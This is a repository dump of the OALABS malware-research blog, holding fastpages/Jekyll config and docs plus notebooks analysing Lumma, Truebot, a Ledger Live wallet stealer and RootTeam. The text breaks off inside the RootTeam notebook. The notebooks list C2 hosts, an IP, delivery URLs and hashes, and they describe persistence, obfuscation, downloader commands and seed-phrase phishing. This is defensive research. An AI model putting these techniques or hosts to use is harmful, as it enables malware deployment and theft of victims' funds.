30 |
--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
1 | # Welcome to Jekyll!
2 | #
3 | # This config file is meant for settings that affect your whole blog.
4 | #
5 | # If you need help with YAML syntax, here are some quick references for you:
6 | # https://learn-the-web.algonquindesign.ca/topics/markdown-yaml-cheat-sheet/#yaml
7 | # https://learnxinyminutes.com/docs/yaml/
8 |
9 | title: OALABS Research
10 | description:
11 | github_username: OALabs
12 | # you can comment the below line out if your repo name is not different than your baseurl
13 | github_repo: "research"
14 |
15 | # OPTIONAL: override baseurl and url if using a custom domain
16 | # Note: leave out the trailing / from this value.
17 | url: "https://research.openanalysis.net" # the base hostname & protocol for your site, e.g. http://example.com
18 |
19 | ###########################################################
20 | ######### Special Instructions for baseurl ###############
21 | #
22 | #### Scenario One: If you do not have a Custom Domain #####
23 | # - if you are not using a custom domain, the baseurl *must* be set to your repo name
24 | #
25 | #### Scenario Two: If you have a Custom Domain #####
26 | # 1. If your domain does NOT have a subpath, this leave this value as ""
27 | # 2. If your domain does have a subpath, you must preceed the value with a / and NOT have a / at the end.
28 | # For example:
29 | # "" is valid
30 | # "/blog" is valid
31 | # "/blog/site/" is invalid ( / at the end)
32 | # "/blog/site" is valid
33 | # "blog/site" is invalid ( because doesn't begin with a /)
34 | #
35 | # 3. You must replace the parameter `baseurl` in _action_files/settings.ini with the same value as you set here but WITHOUT QUOTES.
36 | #
37 | baseurl: "" # the subpath of your site, e.g. "/blog".
38 |
39 | # Github and twitter are optional:
40 | minima:
41 | social_links:
42 |
43 |
44 | # Set this to true to get LaTeX math equation support
45 | use_math:
46 |
47 | # Set this to true to display the summary of your blog post under your title on the Home page.
48 | show_description: true
49 |
50 | # Set this to true to display image previews on home page, if they exist
51 | show_image: false
52 |
53 | # Set this to true to turn on annotations with hypothes.is (https://web.hypothes.is/)
54 | annotations: false
55 |
56 | # Set this to true to display tags on each post
57 | show_tags: true
58 |
59 | # Add your Google Analytics ID here if you have one and want to use it
60 | google_analytics:
61 |
62 | exclude:
63 | - docker-compose.yml
64 | - action.yml
65 | - Makefile
66 |
67 | # this setting allows you to keep pages organized in the _pages folder
68 | include:
69 | - _pages
70 |
71 | # This specifies what badges are turned on by default for notebook posts.
72 | default_badges:
73 | github: true
74 | binder: false
75 | colab: false
76 | deepnote: false
77 |
78 | # Escape HTML in post descriptions
79 | html_escape:
80 | description: false
81 |
82 | # Everything below here should be left alone. Modifications may break fastpages
83 | future: true
84 | theme: minima
85 | plugins:
86 | - jekyll-feed
87 | - jekyll-gist
88 | - jekyll-octicons
89 | - jekyll-toc
90 | - jekyll-twitter-plugin
91 | - jekyll-relative-links
92 | - jekyll-seo-tag
93 | - jekyll-remote-theme
94 | - jekyll-paginate
95 | - jekyll-sitemap
96 | - jemoji
97 |
98 | # See https://jekyllrb.com/docs/pagination/
99 | # For pagination to work, you cannot have index.md at the root of your repo, instead you must rename this file to index.html
100 | paginate: 15
101 | paginate_path: /page:num/
102 |
103 | remote_theme: jekyll/minima@69664442e5a45f631d5bccaba6d7978a91ce22c8
104 |
105 | titles_from_headings:
106 | enabled: true
107 | strip_title: true
108 | collections: true
109 |
110 | highlighter: rouge
111 | markdown: kramdown
112 | kramdown:
113 | math_engine: katex
114 | input: GFM
115 | auto_ids: true
116 | hard_wrap: false
117 | syntax_highlighter: rouge
118 |
119 | # to limit size of xml as it can grow quite large.
120 | feed:
121 | posts_limit: 5 #default posts_limit: 10
122 | excerpt_only: true
123 | disable: true
124 |
125 | exclude:
126 | - settings.ini
127 |
--------------------------------------------------------------------------------
/_notebooks/2024-04-07-lumma-cff.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "metadata": {},
6 | "source": [
7 | "# Lumma Stealer Obfuscation\n",
8 | "> Taking a look at obfuscation in the latest version of lumma\n",
9 | "\n",
10 | "- toc: true \n",
11 | "- badges: true\n",
12 | "- categories: [lumma,obfuscation,cff,ida]"
13 | ]
14 | },
15 | {
16 | "cell_type": "markdown",
17 | "metadata": {},
18 | "source": [
19 | "## Overview\n",
20 | "\n",
21 | "[Lumma](https://telegra.ph/LummaC2---universal-stealer-a-malware-for-professionals-07-27) has been around for a [while](https://www.esentire.com/blog/the-case-of-lummac2-v4-0) initially starting out with plaintext strings and simple to reverse code, but as they continue to evolve they added some [control flow flattening](https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/#h-control-flow-flattening) (CFF) and string encryption. With the latest build more obfuscation has been added which introduces opaque predicates to the CFF. We are going to attempt to use IDA scripting to remove this obfuscation.\n",
22 | "\n",
23 | "## Sample\n",
24 | "`18a065b740da441c636bce23fd72fc0f68e935956131973f15bf4918e317bf03` [[UnpacMe](https://www.unpac.me/results/41d8f31a-3b36-4b77-8b7c-a2d7a81a7034#/)]\n"
25 | ]
26 | },
27 | {
28 | "cell_type": "code",
29 | "execution_count": null,
30 | "metadata": {
31 | "vscode": {
32 | "languageId": "plaintext"
33 | }
34 | },
35 | "outputs": [],
36 | "source": []
37 | },
38 | {
39 | "cell_type": "markdown",
40 | "metadata": {},
41 | "source": [
42 | "## Analysis\n",
43 | "\n",
44 | "The opaque predicates are setup using a jump table with encrypted addresses, for direct jumps the address is simply moved into a register, decrypted, then jumped to. For conditional jumps the jump table is used like an index to locate the correct address, which is then decrypted and jumped to.\n",
45 | "\n",
46 | "```\n",
47 | "00433500 mov eax, dword_4426C0\n",
48 | "00433505 mov ecx, 439EAE97h\n",
49 | "0043350A xor ecx, dword_4426C8\n",
50 | "00433510 add eax, ecx\n",
51 | "00433512 inc eax\n",
52 | "00433513 jmp eax\n",
53 | "\n",
54 | "0043351C mov eax, dword_442714\n",
55 | "00433521 mov ecx, 0DEA4552Dh\n",
56 | "00433526 xor ecx, dword_442718\n",
57 | "0043352C add eax, ecx\n",
58 | "0043352E inc eax\n",
59 | "0043352F nop\n",
60 | "00433530 jmp eax\n",
61 | "\n",
62 | "00433399 movzx eax, al\n",
63 | "0043339C mov eax, dword_4426D4[eax*4]\n",
64 | "004333A3 mov ecx, 42CEBA5h\n",
65 | "004333A8 xor ecx, dword_4426DC\n",
66 | "004333AE add eax, ecx\n",
67 | "004333B0 inc eax\n",
68 | "004333B1 jmp eax\n",
69 | "\n",
70 | "00433312 test eax, eax\n",
71 | "00433314 setz cl\n",
72 | "00433317 mov ecx, dword_4426A0[ecx*4]\n",
73 | "0043331E mov edx, 0AD7AC4AAh\n",
74 | "00433323 xor edx, dword_4426A8\n",
75 | "00433329 add ecx, edx\n",
76 | "0043332B inc ecx\n",
77 | "0043332C jmp ecx\n",
78 | "```\n",
79 | "\n",
80 | "### Algorithm\n",
81 | "- Linear disassembly \n",
82 | "- Track memory moves to regs from jump table memory locations `.data`\n",
83 | "- Reset memory tracking for control flow operations JMP,CALL,RET\n",
84 | "- When we have a JMP to a register use tracked memory location as emulation start and emulate jump address\n",
85 | "- For conditional jumps emulated both values for the index reg for the jump table (0,1) \n",
86 | "- Patch jumps, for condition test the index register and patch conditional jump\n",
87 | "\n",
88 | "**TO BE CONTINUED....**\n"
89 | ]
90 | },
91 | {
92 | "cell_type": "markdown",
93 | "metadata": {},
94 | "source": []
95 | }
96 | ],
97 | "metadata": {
98 | "language_info": {
99 | "name": "python"
100 | }
101 | },
102 | "nbformat": 4,
103 | "nbformat_minor": 2
104 | }
105 |
--------------------------------------------------------------------------------
/_layouts/post.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: default
3 | ---
4 |
5 |
6 |
7 |
{{ page.title | escape }}
8 | {%- if page.description -%}
9 | {%- if site.html_escape.description -%}
10 |
81 | {%- if page.comments -%}
82 | {%- include utterances.html -%}
83 | {%- endif -%}
84 | {%- if site.disqus.shortname -%}
85 | {%- include disqus_comments.html -%}
86 | {%- endif -%}
87 |
88 |
89 |
--------------------------------------------------------------------------------
/_fastpages_docs/DEVELOPMENT.md:
--------------------------------------------------------------------------------
1 | # Development Guide
2 | - [Seeing All Options From the Terminal](#seeing-all-commands-in-the-terminal)
3 | - [Basic usage: viewing your blog](#basic-usage-viewing-your-blog)
4 | - [Converting the pages locally](#converting-the-pages-locally)
5 | - [Visual Studio Code integration](#visual-studio-code-integration)
6 | - [Advanced usage](#advanced-usage)
7 | - [Rebuild all the containers](#rebuild-all-the-containers)
8 | - [Removing all the containers](#removing-all-the-containers)
9 | - [Attaching a shell to a container](#attaching-a-shell-to-a-container)
10 |
11 | You can run your fastpages blog on your local machine, and view any changes you make to your posts, including Jupyter Notebooks and Word documents, live.
12 | The live preview requires that you have Docker installed on your machine. [Follow the instructions on this page if you need to install Docker.](https://www.docker.com/products/docker-desktop)
13 |
14 | ## Seeing All Commands In The Terminal
15 |
16 | There are many different `docker-compose` commands that are necessary to manage the lifecycle of the fastpages Docker containers. To make this easier, we aliased common commands in a [Makefile](https://www.gnu.org/software/make/manual/html_node/Introduction.html).
17 |
18 | You can quickly see all available commands by running this command in the root of your repository:
19 |
20 | `make`
21 |
22 | ## Basic usage: viewing your blog
23 |
24 | All of the commands in this block assume that you're in your blog root directory.
25 | To run the blog with live preview:
26 |
27 | ```bash
28 | make server
29 | ```
30 |
31 | When you run this command for the first time, it'll build the required Docker images, and the process might take a couple minutes.
32 |
33 | This command will build all the necessary containers and run the following services:
34 | 1. A service that monitors any changes in `./_notebooks/*.ipynb/` and `./_word/*.docx;*.doc` and rebuild the blog on change.
35 | 2. A Jekyll server on https://127.0.0.1:4000 — use this to preview your blog.
36 |
37 | The services will output to your terminal. If you close the terminal or hit `Ctrl-C`, the services will stop.
38 | If you want to run the services in the background:
39 |
40 | ```bash
41 | # run all services in the background
42 | make server-detached
43 |
44 | # stop the services
45 | make stop
46 | ```
47 |
48 | If you need to restart just the Jekyll server, and it's running in the background — you can do `make restart-jekyll`.
49 |
50 | _Note that the blog won't autoreload on change, you'll have to refresh your browser manually._
51 |
52 | **If containers won't start**: try `make build` first, this would rebuild all the containers from scratch, This might fix the majority of update problems.
53 |
54 | ## Converting the pages locally
55 |
56 | If you just want to convert your notebooks and word documents to `.md` posts in `_posts`, this command will do it for you:
57 |
58 | ```bash
59 | make convert
60 | ```
61 |
62 | You can launch just the jekyll server with `make server`.
63 |
64 | ## Visual Studio Code integration
65 |
66 | If you're using VSCode with the Docker extension, you can run these containers from the sidebar: `fastpages_watcher_1` and `fastpages_jekyll_1`.
67 | The containers will only show up in the list after you run or build them for the first time. So if they're not in the list — try `make build` in the console.
68 |
69 | ## Advanced usage
70 |
71 | ### Rebuild all the containers
72 | If you changed files in `_action_files` directory, you might need to rebuild the containers manually, without cache.
73 |
74 | ```bash
75 | make build
76 | ```
77 |
78 | ### Removing all the containers
79 | Want to start from scratch and remove all the containers?
80 |
81 | ```
82 | make remove
83 | ```
84 |
85 | ### Attaching a shell to a container
86 | You can attach a terminal to a running service:
87 |
88 | ```bash
89 |
90 | # If the container is already running:
91 |
92 | # attach to a bash shell in the jekyll service
93 | make bash-jekyll
94 |
95 | # attach to a bash shell in the watcher service.
96 | make bash-nb
97 | ```
98 |
99 | _Note: you can use `docker-compose run` instead of `make bash-nb` or `make bash-jekyll` to start a service and then attach to it.
100 | Or you can run all your services in the background, `make server-detached`, and then use `make bash-nb` or `make bash-jekyll` as in the examples above._
101 |
102 |
--------------------------------------------------------------------------------
/_notebooks/2023-07-13-truebot.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "342ed7fc-d919-47f4-be62-2d33e458f872",
6 | "metadata": {},
7 | "source": [
8 | "# Truebot\n",
9 | "> Truely a simple malware leading to ransomware\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [truebot,config,triage]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "45880ffe-5309-4602-bf7e-369a8ae3768f",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "Truebot (aka Silence) is primarily a downloader associated with the threat actor group [TA505](https://malpedia.caad.fkie.fraunhofer.de/actor/ta505). Recently there was a CISA alert [Increased Truebot Activity Infects U.S. and Canada Based Networks](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a) which described ransomware/extortion activity associated with the use of Truebot.\n",
24 | "\n",
25 | "### References\n",
26 | "- [Increased Truebot Activity Infects U.S. and Canada Based Networks](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a) \n",
27 | "- [TrueBot Analysis Part III - Capabilities](https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html)\n",
28 | "- [10445155.r1.v1 (pdf)](https://www.cisa.gov/sites/default/files/2023-07/MAR-10445155.r1.v1.CLEAR_.pdf)\n",
29 | "- [A Truly Graceful Wipe Out](https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/)\n",
30 | "\n",
31 | "### Samples\n",
32 | "- [717beedcd2431785a0f59d194e47970e9544fbf398d462a305f6ad9a1b1100cb](https://www.unpac.me/results/8d1eb4c3-cbb0-4b32-8d52-6f142c836d0f?hash=717beedcd2431785a0f59d194e47970e9544fbf398d462a305f6ad9a1b1100cb#/)"
33 | ]
34 | },
35 | {
36 | "cell_type": "markdown",
37 | "id": "40019d1c-7c62-412b-bc5b-eff15ec576d2",
38 | "metadata": {},
39 | "source": [
40 | "## Analysis\n",
41 | "\n",
42 | "- The binary uses an Adobe PDF icon possibly to trick victims into clicking it. It also displays a fake error message. `\"There was an error opening this document. The file is damaged and could not be repaired. Adobe Acrobat\"`\n",
43 | "- The binary is padded with a significant amount of junk code that is not relevant to its operation. \n",
44 | "- The main code has some checks for debugging tools and AV which if detected cause the malware to execute a deception process (calc.exe)\n",
45 | "- There are multiple anti-emulation techniques used including ...\n",
46 | " - Reading from a fake named pipe\n",
47 | " - Calling EraseTape\n",
48 | " - Checking for a valid code page with GetACP\n",
49 | " - Loading `user32`\n",
50 | " - Trying to open a random invalid file\n",
51 | "- The C2 host and URL path are encrypted using base64, urldecode, and RC4 with a hard coded key\n",
52 | " - `essadonio.com`\n",
53 | " - `/538332[.]php`\n",
54 | "- A hard coded mutex `OrionStartWorld#666` is used to ensure only one copy of the malware is running \n",
55 | "- A GUID is generated for the victim and stored in a randomly named file with the extension `.JSONMSDN` in the `%APPDATA%` directory. This GUID is also used in the C2 communications.\n",
56 | "- A list of processes running on the host is collected and combined with the GUID. It is base64 encoded then sent to the C2 server in a POST request.\n",
57 | "- The C2 has the option of sending the following commands\n",
58 | " - **LSEL** - delete yourself and exit\n",
59 | " - **TFOUN** - array of commands\n",
60 | " - **EFE** - download payload, decrypt with RC4 (hard coded key), and execute PE\n",
61 | " - **S66** - download, decrypt with RC4 (hard coded key),and inject shellcode into `cmd.exe`\n",
62 | " - **Z66** - download, decrypt with RC4 (hard coded key),and run shellcode \n",
63 | "\n",
64 | "\n"
65 | ]
66 | },
67 | {
68 | "cell_type": "code",
69 | "execution_count": null,
70 | "id": "20e99156-df59-471a-8973-70e02fd7e3de",
71 | "metadata": {},
72 | "outputs": [],
73 | "source": []
74 | }
75 | ],
76 | "metadata": {
77 | "kernelspec": {
78 | "display_name": "Python 3",
79 | "language": "python",
80 | "name": "python3"
81 | },
82 | "language_info": {
83 | "codemirror_mode": {
84 | "name": "ipython",
85 | "version": 3
86 | },
87 | "file_extension": ".py",
88 | "mimetype": "text/x-python",
89 | "name": "python",
90 | "nbconvert_exporter": "python",
91 | "pygments_lexer": "ipython3",
92 | "version": "3.9.5"
93 | }
94 | },
95 | "nbformat": 4,
96 | "nbformat_minor": 5
97 | }
98 |
--------------------------------------------------------------------------------
/_fastpages_docs/UPGRADE.md:
--------------------------------------------------------------------------------
1 | # Upgrading fastpages
2 |
3 |
4 |
5 | - [Automated Upgrade](#automated-upgrade)
6 | - [Step 1: Open An Issue With The Upgrade Template.](#step-1-open-an-issue-with-the-upgrade-template)
7 | - [Step 2: Click `Submit new issue`](#step-2-click-submit-new-issue)
8 | - [Step 3: A Link to Pull Request Will Appear](#step-3-a-link-to-pull-request-will-appear)
9 | - [Step 4: Review & Merge PR](#step-4-review-merge-pr)
10 | - [Manual Upgrade](#manual-upgrade)
11 | - [Easy Way (Recommended)](#easy-way-recommended)
12 | - [Advanced](#advanced)
13 | - [Additional Resources](#additional-resources)
14 |
15 |
16 |
17 | **For fastpages repos that are older than December 1st, 2020 the only way to upgrade is to create a brand-new fastpages repo and copy your blog post files into it.** This is because of breaking changes that were made to GitHub Actions around that time.
18 |
19 | There are two ways to upgrade fastpages. One is an automated way that assumes you have made no changes to the HTML of your site. Alternatively, you may [upgrade manually](#manual-upgrade) and determine which changes to accept or reject. For most people we recommend upgrading fastpages automatically.
20 |
21 | ## Automated Upgrade
22 |
23 | - This method is appropriate for those who have not customized the HTML of their site.
24 | - **If you are unsure, try the Automated approach and review which files are changed in the automated PR** to see if this appropriate for you.
25 |
26 | ### Step 1: Open An Issue With The Upgrade Template.
27 |
28 | - Open a new issue in your repository, and push the "Get Started" button for the `[fastpages] Automated Upgrade` Issue template, which looks like this:
29 | - **IF YOU DON'T SEE THIS**: you have an older version of fastpages and you **must [manually upgrade](#manual-upgrade) once** to get this new functionality.
30 |
31 | 
32 |
33 | ### Step 2: Click `Submit new issue`
34 |
35 | - Be careful not to change anything before clicking the button.
36 |
37 | 
38 |
39 | ### Step 3: A Link to Pull Request Will Appear
40 |
41 | - This issue will trigger GitHub to open a PR making changes to your repository for the upgrade to take palce. A comment with the link to the PR will be made in the issue, and will look like this:
42 |
43 | 
44 |
45 | It is possible that you might receive an error message instead of this command. You can follow the instructions in the comment to troubleshoot the issue. Common reasons for receiving an error are:
46 |
47 | - You are up to date, therefore no upgrade is possible. You will see an error that there is "nothing to commit".
48 | - You already have a PR from a previous upgrade open that you never merged.
49 |
50 | Please [ask on the forums](https://forums.fast.ai/) if you have encounter another problem that is unclear.
51 |
52 | ### Step 4: Review & Merge PR
53 |
54 | - Ensure that you read the instructions in the PR carefully. Furthermore, carefully review which files will be changed to determine if this interferes with any customizations you have mades to your site. When ready, select `Merge pull request`.
55 | - If the PR is making undesired changes to files you can use the manual upgrade approach instead.
56 |
57 | ## Manual Upgrade
58 |
59 | ### Easy Way (Recommended)
60 |
61 | Create a new repo with the current `fastpages` template by following the [setup instructions](https://github.com/fastai/fastpages#setup-instructions) in the README, and copy all of your blog posts from `_notebooks`, `_word`, and `_posts` into the new template. This is very similar to what the automated process is doing.
62 |
63 | ### Advanced
64 |
65 | - This method is appropriate for those who made customizations to the HTML of fastpages.
66 | - You must proceed with caution, as new versions of fastpages may not be compatible with your customizations.
67 | - You can use git to perform the upgrade by [following this approach](https://stackoverflow.com/questions/56577184/github-pull-changes-from-a-template-repository/56577320) instead. A step-by-step companion to this stack overflow post with screenshots is [written up here](https://github.com/fastai/fastpages/issues/163#issuecomment-593766189).
68 | - Be careful to not duplicate files, as files in fastpages have been reorganized several times.
69 |
70 |
71 | ## Additional Resources
72 |
73 | - [This Actions workflow](/.github/workflows/upgrade.yaml) defines the automated upgrade process.
74 | - You can get more help with upgrading in the [fastai forums - nbdev & blogging category](https://forums.fast.ai/c/fastai-users/nbdev/48).
75 |
--------------------------------------------------------------------------------
/assets/badges/deepnote.svg:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/_notebooks/2023-11-05-live-ledger.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "36177e8d-9cb6-4215-998b-797986e72628",
6 | "metadata": {},
7 | "source": [
8 | "# Ledger Live Crypto Wallet Attack\n",
9 | "> A Targeted Malware Crypto Stealer\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [live ledger,dotnet,crypto,wallet,stealer]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "94e9cb50-f453-442c-9000-66dfa8494c0b",
19 | "metadata": {},
20 | "source": [
21 | "# Overview\n",
22 | "\n",
23 | "This is a unique looking crypto stealer that appears to have been built custom to target a hardware wallet.\n",
24 | "\n",
25 | "## Sample\n",
26 | "\n",
27 | "- `3333e2846173468a7bf9dc859e2a0418a4bf1a2840802b397463fce5398fb6d3` [UnpacMe](https://www.unpac.me/results/d6205802-3b81-4ec5-9685-103bbcfe386f)\n",
28 | "\n",
29 | "## References \n",
30 | "- [Ledger Live is your one-stop shop to buy crypto, grow your assets, and manage NFTs. Join 6+ million people who trust Ledger for everything web3.](https://www.ledger.com/ledger-live)\n",
31 | "\n"
32 | ]
33 | },
34 | {
35 | "cell_type": "markdown",
36 | "id": "54e44f88-6eed-486e-946c-1ad4afba6640",
37 | "metadata": {},
38 | "source": [
39 | "## Analysis\n",
40 | "- Sample is .NET\n",
41 | "- The sample name is `Ledger Lives.exe` which is possibly an attempt to mimic the wallet\n",
42 | "- The following PDB path is used `C:\\Users\\Kernel32\\source\\repos\\Ledger Lives\\Ledger Lives\\obj\\Release\\Ledger Lives.pdb`\n",
43 | "- Persistence via the runkey `\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run` using the name `Realter HD Audio`\n",
44 | "- Can take screenshot (saved to `screen.png`) -- currently unused \n",
45 | "- There is no mechanism to prevent multiple versions of the malware from running (no mutex)\n",
46 | "\n",
47 | "### C2\n",
48 | "- `94.142.138.148` port `8080`\n",
49 | "\n",
50 | "\n",
51 | "### Wallet Attack\n",
52 | "- Uses a process watch thread to identify when the process `Ledger Live` is launched\n",
53 | "- The real Ledger process is killed and a message box indicating an error is popped up `Firmware verification error, emergency restart`\n",
54 | "\n",
55 | "\n",
56 | "\n",
57 | "- The App uses a fake Live Ledger recover screen to trick the user into plugging in their wallet USB (not required for the attack)\n",
58 | "- The following WMI query is used to wait for the USB to be plugged in `SELECT * FROM __InstanceCreationEvent WITHIN 2 WHERE TargetInstance ISA 'Win32_PnPEntity'`\n",
59 | " - This does not require a Live Ledger USB to be connected, any USB will trigger the query\n",
60 | "- Once the USB is attached the app tricks the user into entering their secret recovery phrase \n",
61 | "\n",
62 | "\n",
63 | "\n",
64 | "- This is then sent to the C2\n",
65 | " \n",
66 | "## Delivery \n",
67 | "According to UnpacMe SourceIntel the sample was downloaded from a (likely compromised) WordPress directory `https://whitecatcorn.com/wp-content/themes/valerielite/13.exe`. According to OSINT from [URLHaus](https://urlhaus.abuse.ch/url/2725945/) LummaStealer was also downloaded from the same WordPress directory ` https://whitecatcorn.com/wp-content/themes/valerielite/updates_installer.exe` hash `9648c6034468d7ee150c2b9b2ce088c14793e1ddf235d596ce14ef754e7d1e9f`. \n",
68 | "\n",
69 | "It is possible that that LummaStealer operator observed evidence of Live Ledger on a victim and then deployed this targeted Live Ledger Stealer. The stealer shows signs of hasty development (spelling errors, unimplemented features, lack of error checking, etc.). This coupled with the the lack of a mutex suggest that the malware was developed for a specific use case, and possibly a specific target.\n",
70 | "\n"
71 | ]
72 | },
73 | {
74 | "cell_type": "code",
75 | "execution_count": null,
76 | "id": "adea48e5-dc9f-49f9-80b1-4958625705c1",
77 | "metadata": {},
78 | "outputs": [],
79 | "source": []
80 | }
81 | ],
82 | "metadata": {
83 | "kernelspec": {
84 | "display_name": "Python 3",
85 | "language": "python",
86 | "name": "python3"
87 | },
88 | "language_info": {
89 | "codemirror_mode": {
90 | "name": "ipython",
91 | "version": 3
92 | },
93 | "file_extension": ".py",
94 | "mimetype": "text/x-python",
95 | "name": "python",
96 | "nbconvert_exporter": "python",
97 | "pygments_lexer": "ipython3",
98 | "version": "3.9.5"
99 | }
100 | },
101 | "nbformat": 4,
102 | "nbformat_minor": 5
103 | }
104 |
--------------------------------------------------------------------------------
/_fastpages_docs/TROUBLESHOOTING.md:
--------------------------------------------------------------------------------
1 | # Filing Bugs & Troubleshooting
2 |
3 | These are required prerequisites before filing an issue on GitHub or on the [fastai forums](https://forums.fast.ai/)
4 |
5 | ## Step 1: Attempt To Upgrade fastpages
6 |
7 | See the [Upgrading guide](https://github.com/fastai/fastpages/blob/master/_fastpages_docs/UPGRADE.md).
8 |
9 | **In addition to upgrading**, if developing locally, refresh your Docker containers with the following commands from the root of your repo:
10 |
11 | `make remove` followed by `make build`
12 |
13 | ## Step 2: Search Relevant Places For Similar Issues
14 |
15 | - [ ] Search the [fastai forums](https://forums.fast.ai/) for similar problems.
16 | - [ ] Search issues on the [fastpages repo](https://github.com/fastai/fastpages/) for a similar problems?
17 | - [ ] Read the [README of the repo](https://github.com/fastai/fastpages/blob/master/README.md) carefully
18 |
19 |
20 | ## Step 3: Observe Build Logs When Developing Locally
21 |
22 | - [ ] Run the [fastpages blog server locally](DEVELOPMENT.md)
23 | - Pay attention to the emitted logs when you save your notebooks or files. Often, you will see errors here that will give you important clues.
24 | - [ ] When developing locally, you will notice that Jupyter notebooks are converted to corresponding markdown files in the `_posts` folder. Take a look at the problematic blog posts and see if you can spot the offending HTML or markdown in that code.
25 | - Use your browser's developer tools to see if there are any errors. Common errors are (1) not able to find images because they have not been saved into the right folder, (2) javascript or other errors.
26 | - If you receive a Jekyll build error or a Liquid error, search for this error on Stack Overflow to provide more insight on the problem.
27 |
28 | ## Step 4: See if there are errors in the build process of GitHub Actions.
29 |
30 | - [ ] In your GitHub repository, you will have a tab called **Actions**. To find build errors, click on the `Event` dropdown list and select `push`. Browse through tthe logs to see if you can find an error. If you receive an error, read the error message and try to debug.
31 |
32 | ## Step 5: Once you have performed all the above steps, post your issue in the fastai forums or a GitHub Issue.
33 |
34 | - [ ] Use the [nbdev & blogging category](https://forums.fast.ai/c/fastai-users/nbdev/48) to specify your problem if posting on the fastpages forums.
35 | - [ ] If you cannot find a similar issue create a new thread instead of commenting on an unrelated one.
36 | - When reporting a bug, provide this information:
37 |
38 | 1. Steps to reproduce the problem
39 | 2. **A link to the notebook or markdown file** where the error is occuring
40 | 3. If the error is happening in GitHub Actions, a link to the specific error along with how you are able to reproduce this error. You must provide this **in addition to the link to the notebook or markdown file**.
41 | 4. A screenshot / dump of relevant logs or error messages you are receiving from your local development environment. the local development server as indicated in the [development guide](https://github.com/fastai/fastpages/blob/master/_fastpages_docs/DEVELOPMENT.md).
42 |
43 |
44 | **You must provide ALL of the above information**.
45 |
46 | # Frequent Errors
47 |
48 | 1. Malformed front matter. Note that anything defined in front matter must be valid YAML. **Failure to provide valid YAML could result in your page not rendering** in your blog. For example, if you want a colon in your title you must escape it with double quotes like this:
49 |
50 | ` - title: "Deep learning: A tutorial"`
51 |
52 | or in a notebook
53 |
54 | `# "Deep learning: A tutorial"`
55 |
56 | See this [tutorial on YAML](https://rollout.io/blog/yaml-tutorial-everything-you-need-get-started/) for more information.
57 |
58 | **Colons, tilda, asteriks and other characters may cause your front matter to break and for your posts to not render.** If you violoate these conventions you often get an error that looks something like this:
59 |
60 | ```bash
61 | Error: YAML Exception reading ... (): mapping values are not allowed
62 | ```
63 |
64 | 2. Can you customize the styling or theme of fastpages? **A**: See [Customizing Fastpages](https://github.com/fastai/fastpages#customizing-fastpages)
65 |
66 | 3. Your initial build failed on GH-Pages Status
67 |
68 | `Error messsage: Unable to build page. Please try again later.` `Error: Process completed with exit code 1.`
69 |
70 | If your github username contains capital letters e.g. YourUserName, go to [config file](../_config.yml#L17) line 17 and rename `YourUserName.github.io` to `yourusername.github.io`. After the commit blog should build without error.
71 |
72 | See the [FAQ](https://github.com/fastai/fastpages#faq) for frequently asked questions.
73 |
--------------------------------------------------------------------------------
/_notebooks/2023-07-20-rootteam.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "48f69525-d31d-4962-afd4-ec2491c84896",
6 | "metadata": {},
7 | "source": [
8 | "# RootTeam\n",
9 | "> Taking a look at this free GO stealer\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [RootTeam,stealer,triage]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "a143393c-3efe-433e-b6df-e1dd111a8160",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "Identified by [@g0njxa](https://twitter.com/g0njxa/status/1675971998529323008), RootTeam is a GO stealer that can be built via a Telegram channel `https[:]//t[.]me/rootteam_bot`. It has been confused with Bandit Stealer another GO stealer with similar functionality. \n",
24 | "\n",
25 | "The sample we are triaging came from @James_inthe_box [twitter post](https://twitter.com/James_inthe_box/status/1678513274856374273?s=20) with a link to the sample on [AnyRun](https://app.any.run/tasks/c3b6937b-5613-4f6c-94a3-e56901d9b2b3/)\n",
26 | "\n",
27 | "\n",
28 | "### References\n",
29 | "\n",
30 | "- [RootTeam Stealer and overlap issues on Bandit Stealer rule detection](https://community.emergingthreats.net/t/rootteam-stealer-and-overlap-issues-on-bandit-stealer-rule-detection/744/1)\n",
31 | "- [Technical Analysis of Bandit Stealer](https://www.zscaler.com/blogs/security-research/technical-analysis-bandit-stealer)\n",
32 | "- [RootTeam builder exposed on twitter](https://twitter.com/suyog41/status/1678683341988540416?s=20)\n",
33 | "- [New Info Stealer Bandit Stealer Targets Browsers, Wallets](https://www.trendmicro.com/en_ca/research/23/e/new-info-stealer-bandit-stealer-targets-browsers-wallets.html)\n",
34 | "- [Yogesh Londhe tweet about the stealer](https://twitter.com/suyog41/status/1674673495106543616)\n",
35 | "- [GO IDA parser (works well!)](https://github.com/0xjiayu/go_parser)\n",
36 | "\n",
37 | "\n",
38 | "### Sample\n",
39 | "\n",
40 | "The sample is being delived via this url `https[:]//telegra[.]ph/Dead-Space-Remake-PC-Download-For-Free-07-07` [AnyRun](https://app.any.run/tasks/c3b6937b-5613-4f6c-94a3-e56901d9b2b3/)\n",
41 | "\n",
